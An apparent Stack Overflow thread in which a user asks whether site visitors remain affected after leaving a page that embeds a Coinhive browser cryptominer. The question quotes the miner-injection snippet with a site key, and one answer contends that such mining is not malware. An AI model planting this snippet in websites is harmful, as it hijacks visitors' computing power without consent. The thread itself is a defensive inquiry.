Site with a bitcoin miner script
Asked Answered
B

3

11

I found some of my users visiting a site that seemed to have a Bitcoin mining JS script in its code:

<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>

My question is, with this are the users still infected even if they navigate away from the page? Do these sort of programs only work while the user has the page open in the browser?

Bacillus answered 28/9, 2017 at 19:30 Comment(5)
No, and Yes, respectively.Molecule
Learn about Service Workers, which give some level of persistence (and can be abused to give more)Synovitis
Thanks @SLaks, I checked the page and the js script and can see its not using Service Workers. Its good to know about them though for future.Bacillus
It uses them. Check my answer.Straphanger
@ArtemArkhipov: You're confusing Web Workers and Service Workers.Synovitis
E
11

with this are the users still infected even if they navigate away from the page?

No

Do these sort of programs only work while the user has the page open in the browser?

Yes, the script will only run on the website that includes it, while the page is open in the browser

UPGRADE:

More information about this script: https://coin-hive.com/

Coinhive offers a JavaScript miner for the Monero Blockchain (...) that you can embed in your website. Your users run the miner directly in their Browser

And https://coin-hive.com/documentation/miner

The miner runs until you explicitely stop it again or the user navigates away.

Ehling answered 28/9, 2017 at 19:38 Comment(0)
P
8

Coinhive does not appear to be "malware" since it does not appear to do anything particularly harmful to the user's computer. If that is the case, the users computers were never "infected" with anything.

It is extremely common these days for websites to load tons of third party scripts and cookies in the background and do hundreds of things you are not aware of every time you use the internet. Most sites load a Google Analytics tracking script when you visit them, even though you did not authorize them to do that. But that would not be considered malware. Most sites load persistent third-party cookies that track your presence from one website to another and create a massive profile of your online habits. This is why you could be shopping for shoes on one site, and then suddenly find that Facebook is serving you ads for shoes. But that also is generally not considered malware.

In terms of "harm" or "unwanted activity", persistent tracking could be said to be more invasive than a coin mining script. The coin mining script is probably just using some of the memory and CPU power of the end user's computer, which is no different from the hundreds of other javascript libraries that are getting loaded in the background without your knowledge.

Praise answered 28/9, 2017 at 19:46 Comment(0)
S
4

I am not familiar with the coin-hive service, but actually script which you have provided contains such lines:

    var JobThread = function() {
            this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
            this.worker.onmessage = this.onReady.bind(this);
            ...
    };

As you see it is using Workers. I was not investigatin the whole script, but anyway using web workers means that some operations can be running even after page was closed. More information in this post.

So the very first answer to your question is YES, users can be possibly infected for some time after page was closed (in theory, if script is written in such way).

But actually script seems to be terminated very soon by the system itself. Also coin-hive platform is not positioned as a malware and should be safe for users system. I don't think that you should worry about that at all.

Straphanger answered 28/9, 2017 at 19:56 Comment(0)

© 2022 - 2024 — McMap. All rights reserved.